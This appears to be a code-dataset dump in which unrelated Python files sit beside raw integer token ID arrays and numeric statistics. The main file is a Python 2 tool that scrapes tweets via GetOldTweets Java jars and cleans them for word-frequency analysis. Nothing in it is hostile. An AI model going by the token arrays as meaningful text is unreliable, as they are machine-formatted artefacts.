17486,
2672,
416,
9723,
1099,
393,
4987,
284,
287,
3597,
11,
3788,
198,
2,
9387,
739,
262,
13789,
318,
9387,
319,
281,
366,
1921,
3180,
1,
29809,
1797,
11,
42881,
198,
2,
34764,
11015,
6375,
7102,
49828,
11053,
3963,
15529,
509,
12115,
11,
2035,
4911,
393,
17142,
13,
4091,
262,
198,
2,
13789,
329,
262,
2176,
3303,
15030,
21627,
290,
11247,
198,
2,
739,
262,
13789,
13,
198,
198,
11748,
18931,
198,
11748,
10688,
198,
11748,
302,
198,
198,
6738,
4020,
1373,
62,
8019,
1330,
4028,
198,
198,
6738,
15055,
78,
62,
11321,
13,
4658,
1330,
2779,
198,
6738,
15055,
78,
62,
11321,
1330,
6631,
198,
198,
25294,
796,
18931,
13,
1136,
11187,
1362,
7,
834,
3672,
834,
8,
628,
198,
4871,
3497,
35,
30094,
74,
45,
873,
45,
7487,
12360,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
38,
1039,
262,
360,
5760,
42,
45593,
82,
351,
19308,
52,
329,
399,
52,
5673,
13760,
13,
628,
220,
220,
220,
9938,
262,
360,
5760,
42,
7071,
3891,
422,
262,
3127,
4566,
290,
198,
220,
220,
220,
15772,
340,
284,
872,
82,
605,
7071,
3891,
1262,
262,
18951,
31308,
198,
220,
220,
220,
1366,
13,
843,
788,
1064,
262,
399,
52,
5673,
10139,
3917,
351,
262,
360,
5760,
42,
198,
220,
220,
220,
7071,
290,
262,
19308,
52,
1988,
13,
628,
220,
220,
220,
1058,
17143,
3127,
62,
11250,
82,
25,
3127,
4566,
1351,
198,
220,
220,
220,
1058,
17143,
10104,
62,
7890,
25,
18951,
31308,
1366,
198,
220,
220,
220,
1058,
17143,
285,
28047,
62,
12286,
25,
285,
28047,
4277,
1988,
329,
45593,
82,
628,
220,
220,
220,
1058,
7783,
25,
360,
5760,
42,
45593,
82,
399,
52,
5673,
13760,
7508,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
16926,
46,
7,
73,
18596,
272,
271,
2599,
1475,
3455,
428,
10361,
422,
28686,
12,
3262,
12,
11250,
284,
3297,
198,
220,
220,
220,
1303,
4075,
299,
873,
628,
220,
220,
220,
1303,
16926,
46,
7,
73,
18596,
272,
271,
2599,
1475,
3455,
428,
10361,
422,
28686,
12,
3262,
12,
11250,
284,
3297,
198,
220,
220,
220,
1303,
4075,
299,
873,
628,
220,
220,
220,
1303,
16926,
46,
7,
73,
18596,
272,
271,
2599,
1475,
3455,
428,
10361,
422,
28686,
12,
3262,
12,
11250,
284,
3297,
198,
220,
220,
220,
1303,
4075,
299,
873,
628,
220,
220,
220,
1303,
29620,
997,
64,
10139,
4686,
329,
3518,
45593,
1438,
628,
220,
220,
220,
1303,
3497,
3518,
7071,
1438,
329,
45593,
1438,
628,
220,
220,
220,
1303,
29620,
288,
30094,
74,
20314,
290,
285,
28047,
7508,
329,
288,
30094,
74,
4566,
198,
220,
220,
220,
1303,
15161,
285,
28047,
7,
47335,
1631,
20007,
8,
318,
973,
611,
645,
19308,
52,
318,
900,
329,
360,
5760,
42,
45593,
628,
198,
4871,
3497,
35,
30094,
74,
14055,
8053,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
38,
1039,
262,
360,
5760,
42,
3122,
35,
7231,
7343,
13,
628,
220,
220,
220,
2080,
5128,
355,
262,
1271,
286,
3518,
21758,
329,
1123,
399,
52,
5673,
10139,
11,
198,
220,
220,
220,
1064,
262,
826,
12219,
32340,
284,
307,
19171,
1863,
351,
663,
198,
220,
220,
220,
20569,
329,
262,
3122,
35,
4755,
1351,
13,
628,
220,
220,
220,
1058,
17143,
10104,
62,
7890,
25,
18951,
31308,
1366,
198,
220,
220,
220,
1058,
17143,
997,
64,
62,
77,
4147,
62,
66,
2850,
62,
9127,
25,
3518,
21758,
954,
329,
1123,
399,
52,
5673,
628,
220,
220,
220,
1058,
7783,
25,
360,
5760,
42,
7231,
7343,
198,
220,
220,
220,
37227,
628,
198,
4871,
3497,
17932,
34,
79,
385,
8053,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
38,
1039,
262,
14504,
32340,
7343,
13,
628,
220,
220,
220,
9135,
14390,
422,
717,
3518,
4755,
318,
19171,
329,
2583,
7767,
198,
220,
220,
220,
319,
1123,
399,
52,
5673,
13760,
13,
628,
220,
220,
220,
1058,
17143,
10104,
62,
7890,
25,
18951,
31308,
1366,
628,
220,
220,
220,
1058,
7783,
25,
14504,
32340,
7343,
198,
220,
220,
220,
37227,
628,
198,
4871,
3497,
35,
30094,
74,
39105,
30871,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
38,
1039,
262,
360,
5760,
42,
47068,
14059,
7343,
13,
628,
220,
220,
220,
1114,
399,
52,
5673,
10139,
351,
360,
5760,
42,
9200,
11,
17802,
4088,
318,
10488,
198,
220,
220,
220,
1912,
319,
19308,
52,
11,
3827,
2256,
290,
6400,
316,
2546,
287,
11876,
13,
628,
220,
220,
220,
1114,
399,
52,
5673,
10139,
1231,
360,
5760,
42,
9200,
11,
5288,
17802,
4088,
318,
198,
220,
220,
220,
8686,
357,
47335,
1631,
352,
4579,
8,
628,
220,
220,
220,
1058,
17143,
288,
30094,
74,
62,
77,
873,
62,
77,
7487,
62,
10951,
25,
360,
5760,
42,
299,
873,
997,
64,
7508,
198,
220,
220,
220,
1058,
17143,
997,
64,
62,
77,
4147,
25,
1351,
286,
997,
64,
13760,
198,
220,
220,
220,
1058,
17143,
16965,
25,
16965,
1988,
198,
220,
220,
220,
1058,
17143,
19638,
62,
7857,
62,
259,
62,
22252,
25,
19638,
2546,
287,
11876,
198,
220,
220,
220,
1058,
17143,
5288,
62,
44971,
62,
31673,
25,
5288,
17802,
4088,
628,
220,
220,
220,
1058,
7783,
25,
360,
5760,
42,
47068,
14059,
7343,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
3082,
1769,
2835,
572,
19308,
52,
1988,
287,
9881,
198,
220,
220,
220,
1303,
1672,
25,
19308,
52,
1988,
50138,
656,
10190,
1433,
9881,
628,
220,
220,
220,
1303,
27131,
689,
17802,
4088,
329,
257,
399,
52,
5673,
10139,
628,
198,
4871,
38240,
15057,
2514,
17257,
8053,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
3103,
24040,
1271,
1351,
656,
2837,
1351,
628,
220,
220,
220,
1058,
17143,
997,
62,
4868,
25,
39650,
46728,
863,
1271,
1351,
355,
4731,
628,
220,
220,
220,
1058,
7783,
25,
39650,
46728,
863,
2837,
1351,
355,
4731,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
26161,
1271,
1351,
656,
2837,
1351,
13,
198,
220,
220,
220,
1303,
994,
5128,
11507,
290,
1441,
1988,
355,
1351,
198,
220,
220,
220,
1303,
1672,
25,
685,
1065,
11,
1511,
11,
1478,
11,
1596,
60,
656,
14631,
1065,
12,
1415,
1600,
366,
1558,
8973,
628,
198,
4871,
38240,
17257,
2514,
15057,
8053,
12502,
7,
8692,
13,
14824,
1154,
46,
12502,
2599,
198,
220,
220,
220,
37227,
3103,
24040,
2837,
1351,
284,
18253,
1351,
628,
220,
220,
220,
1058,
17143,
2837,
62,
4868,
25,
39650,
46728,
863,
2837,
1351,
355,
4731,
1220,
1351,
628,
220,
220,
220,
1058,
7783,
25,
39650,
46728,
863,
1271,
1351,
355,
4731,
198,
220,
220,
220,
37227,
628,
220,
220,
220,
1303,
26161,
2837,
1351,
656,
1271,
1351,
198,
220,
220,
220,
1303,
994,
5128,
11507,
290,
1441,
1988,
355,
1351,
198,
220,
220,
220,
1303,
1672,
25,
14631,
1065,
12,
1415,
1600,
366,
61,
1485,
1600,
366,
1558,
8973,
656,
685,
1065,
11,
1478,
11,
1596,
60,
198
] | 3.160543 | 1,252 |
#!/bin/python
#python
import sys
import os
import time
import re
import shutil
import MySQLdb
#appion
from appionlib import appionScript
from appionlib import apStack
from appionlib import apDisplay
from appionlib import apEMAN
from appionlib import apFile
from appionlib.apSpider import operations
from appionlib.apTilt import apTiltPair
from appionlib import apImagicFile
import sinedon
#=====================
if __name__ == "__main__":
tiltstacks = tiltStackSync()
tiltstacks.start()
tiltstacks.close()
| [
2,
48443,
8800,
14,
29412,
198,
198,
2,
29412,
198,
11748,
25064,
198,
11748,
28686,
198,
11748,
640,
198,
11748,
302,
198,
11748,
4423,
346,
198,
11748,
33476,
9945,
198,
2,
1324,
295,
198,
6738,
598,
295,
8019,
1330,
598,
295,
7391,
198,
6738,
598,
295,
8019,
1330,
2471,
25896,
198,
6738,
598,
295,
8019,
1330,
2471,
23114,
198,
6738,
598,
295,
8019,
1330,
2471,
3620,
1565,
198,
6738,
598,
295,
8019,
1330,
2471,
8979,
198,
6738,
598,
295,
8019,
13,
499,
41294,
1330,
4560,
198,
6738,
598,
295,
8019,
13,
499,
51,
2326,
1330,
2471,
51,
2326,
47,
958,
198,
6738,
598,
295,
8019,
1330,
2471,
3546,
9083,
8979,
198,
11748,
264,
1389,
261,
198,
198,
2,
4770,
1421,
28,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
197,
83,
2326,
301,
4595,
796,
26500,
25896,
28985,
3419,
198,
197,
83,
2326,
301,
4595,
13,
9688,
3419,
198,
197,
83,
2326,
301,
4595,
13,
19836,
3419,
628,
198
] | 3.147239 | 163 |
# bug 3
# http://asu-compmethodsphysics-phy494.github.io/ASU-PHY494/2017/01/24/04_Debugging_1/#activity-fix-as-many-bugs-as-possible
# Print "error" for input 0:
x = float(input("Enter non-zero number --> "))
if x == 0:
print("ERROR: number cannot be 0")
| [
2,
5434,
513,
198,
2,
2638,
1378,
27345,
12,
5589,
24396,
82,
746,
23154,
12,
6883,
39449,
13,
12567,
13,
952,
14,
1921,
52,
12,
11909,
56,
39449,
14,
5539,
14,
486,
14,
1731,
14,
3023,
62,
27509,
2667,
62,
16,
31113,
21797,
12,
13049,
12,
292,
12,
21834,
12,
32965,
12,
292,
12,
79,
4733,
198,
198,
2,
12578,
366,
18224,
1,
329,
5128,
657,
25,
198,
87,
796,
12178,
7,
15414,
7203,
17469,
1729,
12,
22570,
1271,
14610,
366,
4008,
198,
361,
2124,
6624,
657,
25,
198,
220,
220,
3601,
7203,
24908,
25,
1271,
2314,
307,
657,
4943,
628
] | 2.574257 | 101 |
import sys
from openml.exceptions import OpenMLServerException
from requests.exceptions import ChunkedEncodingError
if __name__ == "__main__":
test_automl(600)
| [
11748,
25064,
198,
6738,
1280,
4029,
13,
1069,
11755,
1330,
4946,
5805,
10697,
16922,
198,
6738,
7007,
13,
1069,
11755,
1330,
609,
2954,
276,
27195,
7656,
12331,
628,
628,
198,
198,
361,
11593,
3672,
834,
6624,
366,
834,
12417,
834,
1298,
198,
220,
220,
220,
1332,
62,
2306,
296,
75,
7,
8054,
8,
198
] | 3.12963 | 54 |
from django.contrib import admin
from .models import Business, NeighborHood, Post, Profile
# Register your models here.
admin.site.register(Profile)
admin.site.register(Business)
admin.site.register(Post)
admin.site.register(NeighborHood)
| [
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
6738,
764,
27530,
1330,
7320,
11,
28708,
39,
702,
11,
2947,
11,
13118,
198,
198,
2,
17296,
534,
4981,
994,
13,
198,
28482,
13,
15654,
13,
30238,
7,
37046,
8,
198,
28482,
13,
15654,
13,
30238,
7,
24749,
8,
198,
28482,
13,
15654,
13,
30238,
7,
6307,
8,
198,
28482,
13,
15654,
13,
30238,
7,
46445,
2865,
39,
702,
8,
628
] | 3.442857 | 70 |
import json
import os
T = Translation()
| [
11748,
33918,
198,
11748,
28686,
628,
198,
198,
51,
796,
33322,
3419,
198
] | 3.307692 | 13 |
from django.conf.urls import include, url
from django.contrib import admin
from inventory import views as inventory_index
urlpatterns = [
# Examples:
# url(r'^$', 'rudra.views.home', name='home'),
# url(r'^blog/', include('blog.urls')),
url(r'^$', inventory_index.index, name='index'),
url(r'^item/(?P<id>\d+)/', inventory_index.item_detail, name='item_detail'),
url(r'^admin/', include(admin.site.urls)),
]
| [
6738,
42625,
14208,
13,
10414,
13,
6371,
82,
1330,
2291,
11,
19016,
198,
6738,
42625,
14208,
13,
3642,
822,
1330,
13169,
198,
198,
6738,
13184,
1330,
5009,
355,
13184,
62,
9630,
198,
198,
6371,
33279,
82,
796,
685,
198,
220,
220,
220,
1303,
21066,
25,
198,
220,
220,
220,
1303,
19016,
7,
81,
6,
61,
3,
3256,
705,
81,
463,
430,
13,
33571,
13,
11195,
3256,
1438,
11639,
11195,
33809,
198,
220,
220,
220,
1303,
19016,
7,
81,
6,
61,
14036,
14,
3256,
2291,
10786,
14036,
13,
6371,
82,
11537,
828,
198,
220,
220,
220,
220,
198,
220,
220,
220,
19016,
7,
81,
6,
61,
3,
3256,
13184,
62,
9630,
13,
9630,
11,
1438,
11639,
9630,
33809,
198,
220,
220,
220,
19016,
7,
81,
6,
61,
9186,
29006,
30,
47,
27,
312,
29,
59,
67,
10,
20679,
3256,
13184,
62,
9630,
13,
9186,
62,
49170,
11,
1438,
11639,
9186,
62,
49170,
33809,
198,
220,
220,
220,
19016,
7,
81,
6,
61,
28482,
14,
3256,
2291,
7,
28482,
13,
15654,
13,
6371,
82,
36911,
198,
60,
198
] | 2.494318 | 176 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import time
import datetime
import string
from os import listdir
from os.path import join as pathjoin
from math import log, ceil
import subprocess
import pandas as pd
import nltk
from nltk.corpus import stopwords
import matplotlib.pyplot as plt
import tailer
from ttp import ttp
# use this if you want to include modules from a subfolder
#cmd_subfolder = os.path.realpath(os.path.abspath(os.path.join(os.path.split(inspect.getfile( inspect.currentframe() ))[0],"GetOldTweets-python")))
#if cmd_subfolder not in sys.path:
# sys.path.insert(0, cmd_subfolder)
pd.set_option('display.max_colwidth', -1)
class Twords(object):
""" Object that takes in tweets from Java twitter search engine and allows
manipulation, analysis and visualization.
Attributes:
jar_folder_path (string): path to where java jar twitter search files
are stored
data_path (string): path to data set from java twitter search.
It can be either path to single file, or path to
directory containing several csv files. Files are
assumed to be in format give by output of
create_java_tweets function below
background_path (string): path to background data. Form of background
data file is csv with columns 'word', 'occurrences',
and 'frequency' for words as they occur in some
background corpus.
background_dict (dictionary): dictionary of background rates of English
words, used in comparing word frequencies.
Can be set using create_Background_dict
function.
search_terms (list of strings): list of search terms used when collecting
tweets using create_java_tweets
tweets_df (pandas dataframe): pandas dataframe that holds all tweet data.
This is central object in an instance of
Twords.
word_bag (list of strings): list of all word tokens in tweets contained
in tweets_df, not including stop words (stop
words are contained in self.stop_words)
stop_words (list of string): list of words that shouldn't be included when
computing word bag for tweets. This includes
standard English words like "the" as well as
Twitter-data-specific things like "https://"
freq_dist (nltk object): nltk.FreqDist(self.word_bag); nltk object that
contains statistical properties of words in
word_bag
word_freq_df (pandas dataframe): pandas dataframe containing top n words
in tweets data along with data like
word frequency, word frequency divided
by background frequency for that word, etc.
More info under function
create_word_freq_df(self, n),
which creates word_freq_df.
"""
#############################################################
# Methods to set attributes
#############################################################
def set_Search_terms(self, search_terms):
""" search_terms is a list of strings that were used in twitter search
to obtain data in tweets_df.
The strings will be converted to unicode inside Twords, even though the
user may enter them as ordinary strings.
"""
assert type(search_terms) == list
for term in search_terms:
assert type(term) in (str, unicode)
unicode_list = [x.decode("utf-8") if type(x) == str
else x for x in search_terms]
self.search_terms = unicode_list
def create_Background_dict(self):
""" Create the dictionary of background word rates from file in the
background data path.
key: word (string)
value: tuple of form (frequency, occurrences), where
frequency is frequency of word in background data set, and
occurrences is total number of occurrences in background data
set
"""
sample_rates = pd.read_csv(self.background_path, sep=",", encoding='utf-8')
background_dict = dict(zip(sample_rates["word"], zip(sample_rates["frequency"],sample_rates["occurrences"])))
self.background_dict = background_dict
def create_Stop_words(self):
""" Create list of stop words used in create_word_bag function.
Stop words created here are defaults - the user may add new stop words
later with the add_stop_words function.
This default list combines English stopwords from nltk corpus
(stopwords), punctuation marks from python standard string library,
and a custom-list the author found useful when parsing tweets.
"""
punctuation = [item.decode('utf-8') for item in list(string.punctuation)]
stop = stopwords.words('english') + punctuation + \
[u'rt', u'RT', u'via', u'http', u"n't", u"'s", u"...", u"''",
u"'m", u"--", u"'ll", u"'ve", u"'re", u"//www"]
self.stop_words = stop
##############################################################
# Methods to gather tweets via keyword search with
# Java GetOldTweets
##############################################################
def create_java_tweets(self, total_num_tweets, tweets_per_run, querysearch,
final_until=None, output_folder="output",
decay_factor=4, all_tweets=True):
""" Function that calls java program iteratively further and further
back in time until the desired number of tweets are collected. The
"until" parameter gives the most recent date tweets can be found from,
and the search function works backward in time progressively from that
date until the max number of tweets are found. Thus each new call to
_get_one_java_run_and_return_last_line_date will start the search one
day further in the past.
total_num_tweets: (int) total number of tweets to collect
tweets_per_run: (int) number of tweets in call to java program - should
not be over 50,000, better to keep around 10,000
querysearch: (string) string defining query for twitter search - see
Henrique code
(e.g, "europe refugees" for search for tweets containing
BOTH "europe" and "refugees" - currently putting in OR by
hand does not yield desired result, so two separate
searches will have to be done for "OR" between words)
final_until: (string) date string of the form '2015-07-31' that gives
ending date that tweets are searched before (this is
distinguished from the changing "until" that is used in
the calls to _get_one_java_run_and_return_last_line_date).
If left as "None" it defaults to the current date.
output_folder: (string) name of folder to put output in
decay_factor: (int) how quickly to wind down tweet search if errors
occur and no tweets are found in a run - a failed run
will count as tweets_per_run/decay_factor tweets found,
so the higher the factor the longer the program will try
to search for tweets even if it gathers none in a run
all_tweets: (bool) flag for which jar to use - True means use
all_tweets jar, False means use top_tweets jar
"""
if final_until is None:
final_until = str(datetime.datetime.now())[:10]
print "Collecting", str(total_num_tweets), "tweets with", \
str(tweets_per_run), "tweets per run."
print "Expecting", \
str(int(ceil(total_num_tweets/float(tweets_per_run)))), \
"total runs"
start_time = time.time()
tweets_searched = 0
run_counter = 1
# create folder that tweets will be saved into
subprocess.call(['mkdir', output_folder])
until = final_until
while tweets_searched < total_num_tweets:
print "Collecting run", run_counter
run_counter += 1
# call java program and get date of last tweet found
last_date = self._get_one_java_run_and_return_last_line_date(
querysearch, until, tweets_per_run, all_tweets)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = output_folder + '/' + querysearch + '_' + \
until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is usual date proceed as normal - if not raise error
# and stop search
if self._validate_date(last_date):
until = last_date
tweets_searched += tweets_per_run
else:
# set search date one day further in past
new_until_date_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
# consider this a few tweets searched so program doesn't run
# forever if it gathers no tweets
tweets_searched += (tweets_per_run)/float(decay_factor)
self.data_path = output_folder
self.search_terms = querysearch.split()
print "Total time to collect", str(total_num_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
def get_tweets_from_single_java_csv(self):
""" Takes path to twitter data obtained with java tweet search library
and builds a dataframe of the tweets and their accompanying
information. Dataframe has columns for username, date, retweets,
favorites, text, mentions, and hashtag. The dataframe is stored under
the attribute tweets_pd.
"""
# Read in csv file with many columns to account for people who put many
# semicolons in tweets, then keep only the rows that don't have
# semicolons in a tweet by dropping rows with too many columns.
# (Semicolons are the delimeter in the java twitter search library.)
tweets = pd.read_csv(self.data_path, sep=";",
names=list('abcdefghijklmno'), encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
# Rename the columns with correct labels and drop row that is just
# column names (this will index dataframe starting at 1).
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
# Drop the extra columns on the end
tweets = tweets[["username", "date", "retweets", "favorites", "text",
"mentions", "hashtags", "id", "permalink"]]
# Reindex dataframe
tweets.index = range(len(tweets))
self.tweets_df = tweets
def get_java_tweets_from_csv_list(self, list_of_csv_files=None):
""" Create tweets_df from list of tweet csv files
list_of_csv_files: python list of paths (the paths are strings) to csv
files containing tweets - if list_of_csv_files is
None then the files contained inside self.data_path
are used
"""
if list_of_csv_files is None:
list_of_csv_files = self._get_list_of_csv_files(self.data_path)
path_dict = {}
# create dictionary with paths for keys and corresponding tweets
# dataframe for values
for path in list_of_csv_files:
tweets = pd.read_csv(path, sep=";", names=list('abcdefghijklmno'),
encoding='utf-8')
tweets = tweets[tweets.k.isnull()]
tweets.columns = tweets.iloc[0]
tweets.drop(0, inplace=True)
tweets = tweets[["username", "date", "retweets", "favorites",
"text", "mentions", "hashtags", "id", "permalink"]]
tweets.index = range(len(tweets))
path_dict[path] = tweets
# join all created dataframes together into final tweets_df dataframe
self.tweets_df = pd.concat(path_dict.values(), ignore_index=True)
def _get_one_java_run_and_return_last_line_date(self, querysearch, until,
maxtweets, all_tweets=True,
since=None,
return_line=True):
""" Create one java csv using java jar (either Top Tweets or All tweets
as specified in all_tweets tag) and return date string from last tweet
collected.
querysearch: (string) query string, usually one word - multiple words
imply an "AND" between them
maxtweets: (int) number of tweets to return
since: (string of form '2015-09-30') string of date to search since;
this is optional and won't be used when using the
create_java_tweets function
until: (string of form '2015-09-30') string of date to search until,
since search is conducted backwards in time
return_line (bool): whether to return date from last line or not; if
true the date from the last line in the csv is
returned
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
quotation_mark = '"'
query_string = 'querysearch=' + quotation_mark + querysearch + quotation_mark
until_string = 'until=' + until
maxtweets_string = 'maxtweets=' + str(maxtweets)
# create output_got.csv file of tweets with these search parameters
if since is None:
subprocess.call(['java', '-jar', jar_string, query_string,
until_string, maxtweets_string])
else:
since_string = 'since=' + since
subprocess.call(['java', '-jar', jar_string, query_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(maxtweets), "tweets:", \
round((time.time() - start_time)/60., 1), "minutes"
if return_line:
return date_string
def _get_list_of_csv_files(self, directory_path):
""" Return list of csv files inside a directory
directory_path: (string) path to directory holding csv files of
interest
"""
return [pathjoin(directory_path, f) for f in listdir(directory_path)
if f[-4:] == '.csv']
def _validate_date(self, date_text):
""" Return true if date_text is string of form '2015-06-29',
false otherwise.
date_text (string): date
"""
try:
datetime.datetime.strptime(date_text, '%Y-%m-%d')
return True
except ValueError:
return False
##############################################################
# Methods to gather user timeline tweets with
# Java GetOldTweets
##############################################################
def get_user_tweets(self, user, max_tweets, start_date=None,
end_date=None, all_tweets=True, return_line=True):
""" Returns max_tweets from Twitter timeline of user. Appears to work
better when start and end dates are included. The returned tweets
include tweets on the start_date, and up to (but not including) tweets
on the end_date.
If only an end_date is provided, then the tweets are searched backward
in time starting at the end date and continuing until max_tweets
have been found.
Creates folder named by twitter username searched that contains tweets
in series of csv files.
user (string): Twitter handle of user, e.g. barackobama
max_tweets (int): number of tweets to return for that user; set
max_tweets to -1 to return all tweets in timeline
start_date (string): starting date for search of form "2015-09-30"
end_date (string): ending date for search of form "2015-09-30"
all_tweets (bool): whether to use "top_tweets" or "all_tweets" java
jar file
return_line (bool): whether to return date on last tweet returned;
needed for function that makes repeated calls to
this function, e.g. get_all_user_tweets
"""
start_time = time.time()
# choose which jar file to use
jar_string = self.jar_folder_path + '/got_top_tweets.jar'
if all_tweets:
jar_string = self.jar_folder_path + '/got_all_tweets.jar'
# create search string
user_string = 'username=' + user
maxtweets_string = 'maxtweets=' + str(max_tweets)
if start_date is not None:
since_string = 'since=' + start_date
if end_date is not None:
until_string = 'until=' + end_date
# create output_got.csv file of tweets with these search parameters
if start_date is None and end_date is None:
subprocess.call(['java', '-jar', jar_string, user_string,
maxtweets_string])
elif start_date is None and end_date is not None:
subprocess.call(['java', '-jar', jar_string, user_string,
until_string, maxtweets_string])
else:
subprocess.call(['java', '-jar', jar_string, user_string,
since_string, until_string, maxtweets_string])
# find date on last tweet in this file (in last line of file)
last_line = tailer.tail(open('output_got.csv'), 1)[0]
date_position = last_line.find(';')
date_string = last_line[date_position+1:date_position+11]
date_string = self._convert_date_to_standard(date_string)
print "Time to collect", str(max_tweets), "tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
if return_line:
return date_string
def get_all_user_tweets(self, user, tweets_per_run):
""" Return all tweets in a user's timeline. This is necessary
to do in batches since one call to get_user_tweets does not return
all of the tweets (too many in one run breaks the web-scrolling
functionality of GetOldTweets). The tweets are saved as series of
csv files into output folder named by username of twitter user.
The final date is one day after the current date, since tweets are
returned up to (but not including) the end_date in get_user_tweets
function.
This function will return duplicates of some tweets to be sure all
tweets are obtained - these can be eliminated by simply dropping
duplicates in the text column of resulting pandas dataframe.
Function typically fails to return every single tweet, but captures
most (~87 percent for barackobama) - best performance when
tweets_per_run is around 500.
Creates: folder (named by username searched) of csv files
user (string): twitter handle of user, e.g. "barackobama"
tweets_per_run (int): how many tweets to pull in each run
"""
# increment the date one day forward from returned day when calling
# get_user_tweets to be sure all tweets in overlapping
# range are returned - experimentation showed that tweets on the edge
# between date runs can be lost otherwise
start_time = time.time()
print "Collecting tweets with", str(tweets_per_run), "tweets per run."
# create folder that tweets will be saved into
subprocess.call(['mkdir', user])
# set one day in future so that all tweets up to today are returned;
# necessary because tweets are returned on dates up to but not
# including end date
final_until = str(datetime.datetime.now() +
datetime.timedelta(days=1))[:10]
until = final_until
continue_search = True
run_counter = 1
while continue_search:
print "Collecting run", run_counter
run_counter += 1
# call user function and get date of last tweet found
last_date = self.get_user_tweets(user, tweets_per_run,
end_date=until)
# rename each output file and put into new folder - output file
# is named by until date
new_file_location = user + '/' + until + '.csv'
subprocess.call(['mv', 'output_got.csv', new_file_location])
# if last_date is a date proceed as normal - if the last_date
# hasn't changed, raise comment below
if self._validate_date(last_date):
until_minus_day_object = datetime.datetime.strptime(until, '%Y-%m-%d') \
- datetime.timedelta(days=1)
until_minus_day = str(until_minus_day_object)[:10]
if last_date == until_minus_day:
# from experimentation sometimes a query of many tweets
# will get "stuck" on a day long before 500 tweets have
# been reached - solution is just increment day as usual
print "Tweets timeline incremented by only one day - may " \
"need larger tweets_per_run, or could just be " \
"regular stutter in querying timeline."
until = last_date
else:
# this increment is to avoid losing tweets at the edge
# between date queries - experimentation showed they can
# be lost without this redundancy - this means when tweets
# are read there may be duplicates that require deletion
new_until_date_object = datetime.datetime.strptime(last_date, '%Y-%m-%d') \
+ datetime.timedelta(days=1)
until = str(new_until_date_object)[:10]
else:
continue_search = False
# set data path to new output folder to read in new tweets easily
self.data_path = user
print "Total time to collect tweets:", \
round((time.time() - start_time)/60.,1), "minutes"
#############################################################
# Methods to clean and prune tweets (probably used
# before visual inspection)
#############################################################
def keep_column_of_original_tweets(self):
""" Devote a column of self.tweets_df to the original, unaltered tweets.
Can be useful for comparison after cleaning.
This should be done before any cleaning functions are applied to the
"text" column of self.tweets_df.
"""
self.tweets_df["original_tweets"] = self.tweets_df["text"]
def lower_tweets(self):
""" Lowers case of text in all the tweets, usernames, mentions and
hashtags in the tweets_df dataframe, if the dataframe has those
columns.
"""
column_names = list(self.tweets_df.columns.values)
if "username" in column_names:
self.tweets_df["username"] = self.tweets_df.username.str.lower()
if "text" in column_names:
self.tweets_df["text"] = self.tweets_df.text.str.lower()
if "mentions" in column_names:
self.tweets_df["mentions"] = self.tweets_df.mentions.str.lower()
if "hashtags" in column_names:
self.tweets_df["hashtags"] = self.tweets_df.hashtags.str.lower()
def keep_only_unicode_tweet_text(self):
""" Keeps only tweets where tweet text is unicode. This drops the
occasional tweet that has a NaN value in dataset, which becomes a float
when read into tweets_df.
"""
self.tweets_df["text_type"] = self.tweets_df["text"].map(lambda text: type(text))
self.tweets_df = self.tweets_df[self.tweets_df.text_type == unicode]
del self.tweets_df["text_type"]
# Reindex dataframe
self.tweets_df.index = range(len(self.tweets_df))
def _remove_urls_from_single_tweet(self, tweet):
""" Remove urls from text of a single tweet.
This uses python tweet parsing library that misses some tweets but
doesn't get hung up with evil regex taking too long.
"""
p = ttp.Parser()
result = p.parse(tweet)
for x in result.urls:
tweet = tweet.replace(x, "")
tweet = tweet.strip()
return tweet
def remove_urls_from_tweets(self):
""" Remove urls from all tweets in self.tweets_df
"""
start_time = time.time()
print "Removing urls from tweets..."
print "This may take a minute - cleaning rate is about 400,000" \
" tweets per minute"
self.tweets_df["text"] = self.tweets_df["text"].map(self._remove_urls_from_single_tweet)
minutes_to_complete = (time.time() - start_time)/60.
print "Time to complete:", round(minutes_to_complete,3), \
"minutes"
print "Tweets cleaned per minute:", round(len(self.tweets_df)/minutes_to_complete, 1)
def remove_punctuation_from_tweets(self):
""" Strip common punctuation from tweets in self.tweets_df
"""
self.tweets_df["text"] = self.tweets_df["text"].apply(lambda x:
''.join([i for i in x if i not in
string.punctuation]))
def drop_non_ascii_characters_from_tweets(self):
""" Remove all characters that are not standard ascii.
"""
self.tweets_df['text'] = self.tweets_df["text"].apply(lambda x:
''.join([i if 32 <= ord(i) < 126 else
"" for i in x]))
def _convert_date_to_standard(self, date_text):
""" Convert a date string of form u"yyyy/mm/dd" into form u"yyyy-mm-dd"
for use with the python date module.
"""
assert type(date_text) in (str, unicode)
date_text = date_text.replace('/', '-')
return date_text
def convert_tweet_dates_to_standard(self):
""" Convert tweet dates from form "yyyy/mm/dd" to "yyyy-mm-dd" in
tweets_df dataframe.
"""
self.tweets_df["date"] = self.tweets_df["date"].map(self._convert_date_to_standard)
def sort_tweets_by_date(self):
